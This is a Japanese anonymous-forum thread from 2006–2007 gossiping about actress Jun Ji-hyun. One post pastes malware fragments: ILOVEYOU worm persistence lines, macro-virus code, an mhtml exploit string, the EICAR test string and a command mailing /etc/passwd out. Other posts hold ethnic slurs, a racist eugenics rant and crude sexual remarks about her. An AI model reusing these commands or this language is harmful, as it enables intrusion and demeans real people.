ジヒョン顔の整形だけじゃ物足りなくなって、とうとう豊胸までやっちゃったね。
整形サイボーグの仲間入りオメデト♪

208 :魅せられた名無しさん:2006/07/04(火) 04:04:26
ジヒョンって英語しゃべれたのか…?
ttp://contents.innolife.net/listn.php?ac_id=8&ai_id=8750

209 :魅せられた名無しさん:2006/07/04(火) 09:34:13
チョン女優=整形
コレ常識ね

210 :魅せられた名無しさん:2006/07/04(火) 09:45:02
>>209
ヨンエは違うよ

211 :魅せられた名無しさん:2006/07/20(木) 10:24:26
*^ー――^*

212 :魅せられた名無しさん:2006/07/23(日) 19:09:05
ナイス突っ込みw
http://www.youtube.com/watch?v=TIz9yZmbNGg


213 :魅せられた名無しさん:2006/07/24(月) 12:53:47
>>212
チャンネル桜ですか?

214 :魅せられた名無しさん:2006/07/24(月) 18:49:33
ジヒョンて三白眼ぎみ?
それでもすんごいかわいいけどね。
最近みると前とかわったような気がするけど。?

215 :魅せられた名無しさん:2006/07/24(月) 19:29:44
ttp://photoimg.enjoyjapan.naver.com/view/enjoybbs/viewphoto/psports/108000/20060319114277864559752100.jpg


216 :魅せられた名無しさん:2006/07/24(月) 20:09:00
[僕の彼女を紹介します]のプレミア試写会でジヒョン見たけど、超かわいかった!バツJAPANの馬鹿ファンどもが超うざかったけど。

217 :魅せられた名無しさん:2006/07/25(火) 10:44:39
愛想が悪い。

218 :魅せられた名無しさん:2006/07/25(火) 20:04:22
だがそこがエロい

219 :魅せられた名無しさん:2006/07/26(水) 10:26:56
>>218
わ、わからんw

220 :魅せられた名無しさん:2006/07/26(水) 10:34:19
ツンデレ?

221 :魅せられた名無しさん:2006/07/26(水) 10:34:53
ツンデレ?

222 :魅せられた名無しさん:2006/07/26(水) 13:19:42
のびてると思ったが夏休みか…
この人の写真最近見てないや

223 :魅せられた名無しさん:2006/08/01(火) 18:04:16

チャンネル桜 ≪国賊特集≫

日韓基本条約の解説 1〜3
http://www.youtube.com/watch?v=HotuV_KlLjA
http://www.youtube.com/watch?v=X_9XjKDzkMY
http://www.youtube.com/watch?v=NHENBDx6860 ←★ここ注目!!
ちょ!!! 朝日って・・
http://www.youtube.com/watch?v=EoAmItpLGuE ←★ここ注目!!
実際に南京に行った方の証言1〜2
http://www.youtube.com/watch?v=PLBLDqLU0TU 
http://www.youtube.com/watch?v=fZAoxtcUUlc 

朝日新聞の「植村隆」と「本多勝一」って、とんでもない国賊ですね
皆さんも気をつけてくださいね





224 :魅せられた名無しさん:2006/08/01(火) 21:25:56
チャンネル桜w

225 :魅せられた名無しさん:2006/08/06(日) 00:01:11
「東方神起 7thシングル『Sky』発売記念 SKY TOUCH会」開催決定!(2006.07.31)
2006年8月20日(日)都内某所にて、SKY TOUCH会を開催します。
『Sky』2商品(RZCD-45426・RZCD-45427)どちらかの帯(初回盤・通常盤とちらでも可)をご持参のうえ、
イベント会場にご来場頂き、帯1枚につき、ご希望のメンバー一人とSKY TOUCH(ハイタッチ)ができます。


東方神起のCDを買って、東方神起とSKY TOUCH(ハイタッチ)をしよう

226 :魅せられた名無しさん:2006/08/06(日) 10:56:08
女神

227 :魅せられた名無しさん:2006/08/07(月) 13:01:34
いいともクルーーーーー

228 :魅せられた名無しさん:2006/08/07(月) 20:05:23
majide?

229 :魅せられた名無しさん:2006/08/07(月) 20:17:56
http://www.youtube.com/watch?v=ly2-qjCWLZ0
http://www.youtube.com/watch?v=FabvOOZn7Fg
http://www.youtube.com/watch?v=6C_Z4I2YnqI

230 :魅せられた名無しさん:2006/08/08(火) 15:32:50
いいとも出てないよね?w

231 :魅せられた名無しさん:2006/08/15(火) 16:11:06
ジヒョンが中国系って中国でも有名なの?中国のひといたらおせえて。
中国でも有名らしいけど。


232 :魅せられた名無しさん:2006/08/16(水) 01:20:10
所属事務所の社長と婚約中って話のほうが有名だけどね。

233 :魅せられた名無しさん:2006/08/19(土) 21:16:47
パーフェクトな女

234 :魅せられた名無しさん:2006/08/20(日) 13:26:11
最近また鼻を整形して
よりパーフェクトな美女になったおo(^-^)o

235 :魅せられた名無しさん:2006/08/26(土) 17:34:18
花王はアジエンスのCMにチャン・ツィイーみたいなブサイクを使うな!
ブサイクな中国女優なんかさっさと首にして、ジヒョンちゃんを起用しろ!
ジヒョンちゃんこそまさにアジアン・ビューティーじゃないか!
韓国女優の美しさの前では、日本や中国の女優はゴミ同然。


236 :花王:2006/08/26(土) 17:40:43
2重顎なので却下

237 :魅せられた名無しさん:2006/08/28(月) 02:24:43
可愛いじょ〜
http://japanese.chosun.com/site/data/html_dir/2006/08/27/20060827000016.html

238 :魅せられた名無しさん:2006/09/01(金) 09:51:20
ドMにはたまらん女

239 :魅せられた名無しさん:2006/09/02(土) 23:17:12
>>237 イエジン良いじゃんw

240 :魅せられた名無しさん:2006/09/07(木) 22:46:24
 やりたい

241 :魅せられた名無しさん:2006/09/08(金) 15:45:53

http://japanese.chosun.com/site/data/html_dir/2006/05/19/20060519000024.html

242 :魅せられた名無しさん:2006/09/11(月) 10:54:58
長澤まさみキライじゃ

243 :魅せられた名無しさん:2006/09/25(月) 12:31:09
韓国のネチズンにはかなり嫌われてるみたい


ハリウッド進出か。チャンツイと競演キボヌ

244 :魅せられた名無しさん:2006/09/26(火) 01:32:17
イケメン

245 :魅せられた名無しさん:2006/09/28(木) 02:34:21
また社長と海外か


246 :魅せられた名無しさん:2006/09/28(木) 12:42:18
香港パパラッチ、GJ!

247 :魅せられた名無しさん:2006/09/28(木) 15:18:28
>>246
これか?

(故ニュース=白民嶺記者) 俳優ジョン・ジヒョンが所属社サイドス HQのジョン・フンタク社長とショッピングを楽しむ場面が香港言論によって捕捉された.

中国の 'シナダッコム' 香港版は "韓国のスタージョン・ジヒョンが最近特別な公式日程なしに香港を訪問,親密に見える男と一緒にショッピングを楽しんだ"と報道した.写真はジョン・ジヒョンが男 1人,女 1人と一緒にショッピングモールを集めている場面.


'シナダッコム'は "(ジョン・ジヒョンと男が) お互いに親密な感じを受けたしジョン・ジヒョンはショッピングの相当時間を男服購買に割いた"と伝えた.またジョン・ジヒョンが服を買うと男がお金を支払ったと報道,二人の関係に疑問を現わしたり.

これに対してサイドス HQ側は "ジョン・ジヒョンとショッピングを楽しんだことで報道した男はジョン・フンタク社長"と明らかにした.またジョン・フンタク社長がジョン・ジヒョンのマネージャーであるだけに,全然変なことがないという立場だ.nescafe@gonews.co.kr
インターネット新聞球である 1位故ニュース ? 故ニュース www.gonews.co.kr),無断転載及び栽培砲金誌
白民嶺(記者)
http://kr.news.yahoo.com/service/news/shellview.htm?linkid=16&articleid=20060927113533872a3&newssetid=83

248 :魅せられた名無しさん:2006/09/28(木) 22:20:57
チョン・ジヒョン、香港で男とショッピング?
http://japanese.joins.com/article/article.php?aid=80265&servcode=700§code=750

249 :チョン・ジヒョン:2006/09/29(金) 18:17:06
誰かなんとか言ってよ!!無名タレントみたいじゃない!!

250 :魅せられた名無しさん:2006/09/29(金) 22:33:22
俺はやっぱり好きだけどね君のこと
たとえ性格が悪くてもね

251 :魅せられた名無しさん:2006/09/29(金) 22:38:55
>>250
たまりにたまってしまった俺のジヒョングッズ、もらってくれ!

252 :魅せられた名無しさん:2006/09/30(土) 00:20:49
>>250
俺も!
いろんなバージョンの同じものたくさんあるよ、全部もらってくれ!

253 :250:2006/09/30(土) 01:15:18
タダなら喜んでもらってやろう
だがな、悪いことは言わん
とっておけ!
いつか愛はよみがえるもんさ
俺の愛するジヒョンは数本の映画の中だけに実在する
整形だろうがなんだろうが彼女の美は俺を打ちのめした
それ以外のリアルでの噂話なんて全部夢みたいなもんだ
反日がどうした
ピザがなんだってんだ
おまいら「猟奇〜」を見直してみろよ
女の子はああでなくっちゃ
女って生き物は俺達の夢であり永遠の謎だ
ジヒョンはそんなたわごとを信じさせてくれる唯一の存在だ
そんな女の子が他にいるかよ

254 :魅せられた名無しさん:2006/10/01(日) 15:09:46
女優として終わってる・・

255 :魅せられた名無しさん:2006/10/01(日) 17:13:10
昨夜ジヒョンの動画フォルダ削除したんだけど、4GBもあった…。

256 :魅せられた名無しさん:2006/10/02(月) 18:03:29
http://www.youtube.com/watch?v=tezHHa3_rG4

( ;゚Д゚)久米がジヒョンタンの頭を叩いてる…

257 :魅せられた名無しさん:2006/10/02(月) 21:09:59
>>256
http://toudaigoukakubenkyohou.hp.infoseek.co.jp/hosono_goshi_010.jpg
http://toudaigoukakubenkyohou.hp.infoseek.co.jp/hosono_goshi_011.jpg

258 :魅せられた名無しさん:2006/10/06(金) 11:18:53
アゲトクネ

259 :魅せられた名無しさん:2006/10/09(月) 16:23:00
お詫びの内容

お詫び・・4行

タレは悪くない、タレが悲しむ・・4行
だから会場に来い・・7行

混乱のもとになっている「タレは本当に来るのか」については明快には触れず

260 :魅せられた名無しさん:2006/10/11(水) 07:10:15
かわいいやんけ

261 :魅せられた名無しさん:2006/10/11(水) 22:31:33
毎日オカズにしてます

262 :魅せられた名無しさん:2006/10/12(木) 00:09:53
サイダスの社長チョン・フンタクのチンポを何年も舐めてるジヒョンをおかずにしてます

263 :魅せられた名無しさん:2006/10/12(木) 09:12:46
日本の容姿を改善するには

1、日本男は全員去勢・日本ブス女も去勢

2、イケメン白人男の移民を大量に受け入れて一定以上の容姿を持つ日本女に中出ししまくってもらう

3、出来たハーフがオスなら去勢、メスなら更に白人男に中出ししてもらう

4、3を3世に渡って繰り返す

こうすれば白人種は減らず、日本は白人国になれる



264 :魅せられた名無しさん:2006/10/14(土) 01:49:04
なんかアホな警官役の映画を今見てるんだが、普通にかわいいぞ
昔はもっとかわいかったのか?
デイジーも海外で見たけど、かわいかったな、映画自体なんか微妙だったけんど

265 :魅せられた名無しさん:2006/10/14(土) 03:48:11
映画ってさ
猟奇の他に面白いもの出てるの?

266 :魅せられた名無しさん:2006/10/14(土) 03:50:50
韓国のリブタイラー

267 :魅せられた名無しさん:2006/10/14(土) 03:56:19
国境を越えて
あ、すごい魅力的ですね。
単にひとめで人の目を引く女優さんではないかと。
ぱっとしてる。
ああ、かわええなぁーと一瞬にして人を魅了。

268 :魅せられた名無しさん:2006/10/14(土) 04:22:55
>>263
まずは、あなたの国で実践してみませんか?
とりあえず、帰国してくださいね。

269 :魅せられた名無しさん:2006/10/14(土) 04:24:20
↑自演お疲れ

270 :魅せられた名無しさん:2006/10/14(土) 04:26:28
リブタイラーのアルマゲドンなんか見た時の
CMでの可愛らしさ。
久々に綺麗な女優がでたなぁーと
思ったが。

271 :魅せられた名無しさん:2006/10/14(土) 04:29:55
268
女性?なら空しくない?
美人貶して。

272 :魅せられた名無しさん:2006/10/14(土) 04:36:31
指輪を見た時に客の
女子高生はリブかわいいーって言ってましたがな。
ネットはリブの悪口ばっかりだった

273 :魅せられた名無しさん:2006/10/16(月) 02:08:29
さきほど、僕の彼女を〜のDVDを見ました
なんか微妙ですね、映画そのものが…
でも彼女はやっぱりかわいいと思いました

274 :魅せられた名無しさん:2006/10/16(月) 14:21:31
「チョン・ジヒョン、香港で男性とショッピング?」
http://japanese.chosun.com/site/data/html_dir/2006/09/27/20060927000019.html

隣の女性スタッフ、ジヒョンより背が高いの〜
176ぐらい?

275 :魅せられた名無しさん:2006/10/20(金) 20:17:04
さて、イルマーレ見るか

276 :魅せられた名無しさん:2006/10/26(木) 13:07:45
イイっ!

277 :魅せられた名無しさん:2006/10/26(木) 23:34:37
好き♪
http://cross-breed.com/xxx/hasu1.jpg

278 :魅せられた名無しさん:2006/11/04(土) 16:45:26
次の映画は決まってないのか

もっと仕事しろよ


279 :魅せられた名無しさん:2006/11/06(月) 01:35:58
わたしが出演してもいいと思える脚本がないのよなぁ…

280 :魅せられた名無しさん:2006/11/06(月) 16:50:08
日本進出が失敗、資金も使い果たし大変見たいね。 地味に韓国で仕事してたらよかったのに

281 :魅せられた名無しさん:2006/11/07(火) 10:39:50
韓国ではもう誰もジヒョンと映画撮りたくないらしいから。

282 :魅せられた名無しさん:2006/11/07(火) 23:43:38
じゃあ俺と鷹さんで共演だな。

283 :魅せられた名無しさん:2006/11/08(水) 22:39:03
俺も出るわ

284 :魅せられた名無しさん:2006/11/09(木) 01:44:05
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

285 :魅せられた名無しさん:2006/12/09(土) 13:52:17
かわいいのう

286 :魅せられた名無しさん:2006/12/09(土) 19:12:14
誰か最近の画像くれ

287 :魅せられた名無しさん:2006/12/09(土) 21:03:54
mms://media.photohighway.co.jp/image8/p001/234/Photos/76922113637f1.wmv

288 :魅せられた名無しさん:2006/12/11(月) 15:45:54
北核実験で日パチンコ業界は…

北朝鮮の核実験以後、日本の大衆賭博産業であるパチンコが今、注目されている。

日本パチンコ業界を韓国系と朝鮮総連系が事実上掌握しており、その輸入の一部が
北朝鮮の外貨難の解決に大きな役割をしているといわれる、いわゆる「パチンコ
コネクション」で、パチンコを国民的娯楽とまで思う日本人たちは複雑な心境なのだ。

東京で会った印刷業種従事者のクズハラさん(55)は「私の使うお金が(北朝鮮の
核実験など)そのようなことを助けてしまうのかと思うと気分が良くない」とし
「パチンコに行くのも減らしている」と言った。

関係専門家は日本のパチンコ産業の規模は年間27兆円規模で、このうちの一部が
北朝鮮に渡っているものとみられている。2005会計年度に日本から北朝鮮に公式送金
された金額は3兆円だが、一部では実際送金金額は約10兆円にのぼるものと見ている。

このような事情にもかかわらず韓国系や朝鮮総連系のパチンコ関係者には現在、事業は
特に心配の種にはなっていない。送金中断に頭を悩める北朝鮮内の知人らの心配が先走る
だけだという。日本のパチンコ業界関係者のササキタカアキさんも「我々の業界に韓国や
朝鮮総連系が多いが、日本政府の対北制裁以後も大きく心配はしていない」とし「核実験
以後にも収入には特別差はない」と話している。

2006.12.03 19:00:05
ttp://japanese.joins.com/article/article.php?aid=82375&servcode=200§code=200


289 :魅せられた名無しさん:2006/12/31(日) 11:48:16
チン・ポコンって誰?

290 :魅せられた名無しさん:2007/01/09(火) 18:12:03
糞スレいっぱい立てるな

291 :魅せられた名無しさん:2007/01/09(火) 23:43:21
ぶっ殺されたい?

292 :魅せられた名無しさん:2007/01/10(水) 10:52:51
最近なにしてるの?

293 :魅せられた名無しさん:2007/01/10(水) 18:20:58
つぶ貝食べながら焼酎のんでる

294 :魅せられた名無しさん:2007/01/15(月) 10:58:38
仕事しろよ、ババアになる前に

295 :魅せられた名無しさん:2007/02/08(木) 23:36:55
落ち目ババアage

296 :魅せられた名無しさん:2007/02/08(木) 23:50:39
笑うとすごくかわいいんだよねこの子


297 :魅せられた名無しさん:2007/02/09(金) 00:25:48
笑わなくてもかわいいよ

298 :魅せられた名無しさん:2007/02/09(金) 23:44:51
中田氏したい

299 :魅せられた名無しさん:2007/02/11(日) 17:00:32
チョン・ジヒョン ハリウッド“初出演”秒読み段階!
ttp://www.wowkorea.jp/news/enter/2007/0125/10019792.html

300 :魅せられた名無しさん:2007/02/12(月) 00:01:16
久米宏と共演!

301 :魅せられた名無しさん:2007/02/12(月) 22:04:03
737 :魅せられた名無しさん :2007/02/02(金) 16:07:08
ジヒョンは社長の女だから脱がないよ

738 :魅せられた名無しさん :2007/02/02(金) 16:18:35
社長ブサイのに付き合ってるのは優遇してもらえるから?
ジヒョンもブサだよね

739 :魅せられた名無しさん :2007/02/02(金) 19:41:24
そりゃお金持ちだもん
付き合えばなんでも言うこと聞いてくれるし
普通手に入らないような高いモノ買ってくれるだろうし
旅行、留学し放題
何もしなくても待遇いいんじゃないかな

742 :魅せられた名無しさん :2007/02/02(金) 20:59:13
>>738
うん、ブサw
映画のポスターは加工しすぎ

743 :魅せられた名無しさん :2007/02/02(金) 21:24:58
>>742
え?映画のポスター、他重要な場面で見かけるものすべて見たうえで
ブサだとおもってたんだけど

744 :魅せられた名無しさん :2007/02/02(金) 21:38:34
加工してもブサってことですか

745 :魅せられた名無しさん :2007/02/02(金) 21:47:39
目付き悪いもんなw
場末の高齢ホステスみたいな目してる

302 :魅せられた名無しさん:2007/02/22(木) 22:13:16
>>301の745についてはキムテヒのことだったと思うよ


50 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)